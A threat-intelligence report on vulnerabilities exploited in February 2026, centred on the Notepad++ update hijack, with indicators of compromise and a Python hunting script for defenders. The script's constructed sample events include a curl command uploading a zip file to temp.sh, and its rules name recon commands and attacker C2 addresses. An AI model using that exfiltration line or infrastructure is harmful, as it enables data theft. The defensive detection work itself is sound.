February 2026 brought a 43% decline in high-severity vulnerabilities compared to the previous month. Recorded Future's Insikt Group® tracked 13 vulnerabilities requiring urgent remediation, down from 23 in January 2026. Each carried a 'Very Critical' Recorded Future Risk Score.
Key findings for security teams:
- Microsoft dominates the landscape: Six vulnerabilities—46% of February's total—affected Microsoft products. CISA added all six to its Known Exploited Vulnerabilities catalog on the same day.
- Supply-chain compromise targets Notepad++: Lotus Blossom, a suspected Chinese state-sponsored group, weaponized CVE-2025-15556 to hijack Notepad++'s update mechanism, distributing Cobalt Strike Beacon and the Chrysalis backdoor.
- APT28 leverages MSHTML weakness: Russia's APT28 exploited CVE-2026-21513 through weaponized Windows Shortcut files to execute multi-stage attacks.
- Exploit code circulating: Four vulnerabilities have public proof-of-concept exploits available. A fifth allegedly has exploit code for sale.
Bottom line: The 43% drop in volume doesn't diminish the threat. February's vulnerabilities include confirmed nation-state exploitation and five remote code execution flaws, underscoring the need for intelligence-driven patch prioritization.
February 2026 Vulnerability Reference
All 13 vulnerabilities listed below were actively exploited during February 2026.
Table 1: Vulnerabilities actively exploited in February 2026 based on Recorded Future data. *An alleged exploit for CVE-2026-21533 is advertised for sale on GitHub. Recorded Future Triage captured the advertisement, viewable here via Replay Monitor. (Source: Recorded Future)
February 2026 Threat Landscape
Most Targeted Vendors
- Microsoft accounted for six vulnerabilities spanning Windows, Windows Server, Office, and Microsoft 365
- BeyondTrust disclosed a critical OS command injection flaw affecting Remote Support (RS) 25.3.1 and earlier, plus Privileged Remote Access (PRA) 24.3.4 and earlier
- Cisco faced active exploitation of an authentication bypass in Catalyst SD-WAN infrastructure
- Other affected vendors: Notepad++, Apple, Soliton Systems K.K., Google, Dell
Dominant Vulnerability Classes
- CWE-78 – OS Command Injection (most common, tied)
- CWE-693 – Protection Mechanism Failure (most common, tied)
- CWE-476 – NULL Pointer Dereference
- CWE-843 – Type Confusion
- CWE-807 – Reliance on Untrusted Inputs in a Security Decision
Confirmed Threat Actor Activity
Malware campaigns linked to specific vulnerabilities:
- Lotus Blossom (suspected Chinese state-sponsored) weaponized CVE-2025-15556 to intercept Notepad++ updates between June and December 2025. The operation rotated command-and-control servers across three distinct attack chains, delivering a Metasploit loader, Cobalt Strike Beacon, and the custom Chrysalis backdoor.
- APT28 (Russian state-sponsored) exploited CVE-2026-21513 via malicious Windows Shortcut files containing embedded HTML payloads. Network telemetry linked the activity to known APT28 infrastructure.
- UNC6201 (suspected Chinese nexus) leveraged CVE-2026-22769 to compromise Dell RecoverPoint for VMs appliances, installing the SLAYSTYLE web shell, BRICKSTORM backdoor, and GRIMBOLT—a C# backdoor compiled with native AOT to evade detection.
Extended exploitation timelines:
- UAT-8616 chained CVE-2026-20127 with CVE-2022-20775 to gain root access on Cisco Catalyst SD-WAN systems. Cisco Talos attributes the campaign to a sophisticated actor and assesses that the activity dates back to at least 2023.
Immediate Action Required: CVE-2025-15556
CVE-2025-15556 | Notepad++ Supply-Chain Compromise
Risk Score: 99 (Very Critical) | CISA KEV: Added February 12, 2026
Why this matters: Lotus Blossom hijacked Notepad++'s update mechanism to distribute malicious installers over six months, deploying Cobalt Strike and the Chrysalis backdoor to targeted users. The flaw exists in the WinGUp updater used by Notepad++ versions before 8.8.9, which fails to cryptographically verify update metadata and installer packages.
Affected versions: Notepad++ prior to 8.8.9 (upgrade to 8.9.1 recommended)
Immediate remediation steps:
- Deploy Notepad++ version 8.9.1, released January 26, 2026
- Hunt for malicious update.exe (SHA256: 4d4aec6120290e21778c1b14c94aa6ebff3b0816fb6798495dc2eae165db4566)
- Monitor for GUP.exe spawning unexpected child processes
- Inspect network connections to 45[.]76[.]155[.]202, 45[.]77[.]31[.]210, 45[.]32[.]144[.]255, or 95[.]179[.]213[.]0
- Search for ProShow directories under %APPDATA% or suspicious files in %APPDATA%\Adobe\Scripts\
- Alert on curl.exe uploading to temp[.]sh
Known command-and-control infrastructure: 45[.]76[.]155[.]202, 45[.]77[.]31[.]210, cdncheck[.]it[.]com, safe-dns[.]it[.]com, 95[.]179[.]213[.]0
Detection resources: Insikt Group developed Sigma rules to identify update.exe executing reconnaissance commands (whoami, tasklist, systeminfo, netstat -ano) and curl-based exfiltration. Rules are available to Recorded Future customers.
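As an added illustration of the hunting steps and the Sigma logic described above (example code written for this page, not Recorded Future's Sigma rules), the following Python runs the listed indicators over constructed Sysmon-style events. The allow-list of expected GUP.exe children, the %APPDATA% path patterns and the sample telemetry itself are assumptions; only the hash, addresses and domains come from the report.

```python
import re

# Indicators quoted in the write-up above; defanged IPs/domains are re-fanged for matching.
MALICIOUS_UPDATE_SHA256 = "4d4aec6120290e21778c1b14c94aa6ebff3b0816fb6798495dc2eae165db4566"
C2_INDICATORS = {x.replace("[.]", ".") for x in ("45[.]76[.]155[.]202", "45[.]77[.]31[.]210",
    "45[.]32[.]144[.]255", "95[.]179[.]213[.]0", "cdncheck[.]it[.]com", "safe-dns[.]it[.]com")}
RECON_CMDS = {"whoami", "tasklist", "systeminfo", "netstat"}
# Assumption: a clean GUP.exe only launches Notepad++ itself or the official npp.*.Installer*.exe.
EXPECTED_GUP_CHILD = re.compile(r"^(notepad\+\+\.exe|npp\..*installer.*\.exe)$")
_base = lambda p: p.lower().rsplit("\\", 1)[-1]  # 'C:\\x\\GUP.exe' -> 'gup.exe'

def hunt(events):
    """Match Sysmon-style events against the hunting steps; return (rule, event) pairs."""
    hits = []
    for ev in events:
        image, parent = _base(ev.get("Image", "")), _base(ev.get("ParentImage", ""))
        cmd = ev.get("CommandLine", "").lower()
        if ev["EventID"] == 1:  # process creation
            if MALICIOUS_UPDATE_SHA256 in ev.get("Hashes", "").lower():
                hits.append(("known_malicious_update_exe", ev))
            if parent == "gup.exe" and not EXPECTED_GUP_CHILD.match(image):
                hits.append(("gup_unexpected_child", ev))
            if parent == "update.exe" and image.removesuffix(".exe") in RECON_CMDS:
                hits.append(("update_exe_recon", ev))
            if image == "curl.exe" and "temp.sh" in cmd:  # upload switch varies, so key on the host
                hits.append(("curl_tempsh_exfil", ev))
        elif ev["EventID"] == 3:  # network connection
            if {ev.get("DestinationIp"), ev.get("DestinationHostname")} & C2_INDICATORS:
                hits.append(("known_c2_connection", ev))
        elif ev["EventID"] == 11:  # file creation
            path = ev.get("TargetFilename", "").lower()
            if "\\appdata\\" in path and ("\\proshow\\" in path or "\\adobe\\scripts\\" in path):
                hits.append(("suspicious_appdata_drop", ev))
    return hits

# Constructed sample telemetry (not real captures); only the hash and IP above come from the report.
TMP = r"C:\Users\u\AppData\Local\Temp"
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Program Files\Notepad++\updater\GUP.exe",  # benign update check
     "ParentImage": r"C:\Program Files\Notepad++\notepad++.exe", "CommandLine": "GUP.exe -v8.8.8"},
    {"EventID": 1, "Image": TMP + r"\update.exe", "ParentImage": r"C:\Program Files\Notepad++\updater\GUP.exe",
     "CommandLine": "update.exe", "Hashes": "SHA256=" + MALICIOUS_UPDATE_SHA256.upper()},
    {"EventID": 1, "Image": r"C:\Windows\System32\netstat.exe", "ParentImage": TMP + r"\update.exe",
     "CommandLine": "netstat -ano"},
    {"EventID": 1, "Image": r"C:\Windows\System32\curl.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"curl.exe -F file=@C:\Users\u\out.zip https://temp.sh/upload"},
    {"EventID": 3, "Image": TMP + r"\update.exe", "DestinationIp": "45.76.155.202"},
    {"EventID": 11, "Image": TMP + r"\update.exe", "TargetFilename": r"C:\Users\u\AppData\Roaming\ProShow\svc.dll"},
]
```

Calling `hunt(SAMPLE_EVENTS)` flags every event except the first (a normal Notepad++ update check), with the tampered installer matched twice: once by hash and once as an unexpected GUP.exe child.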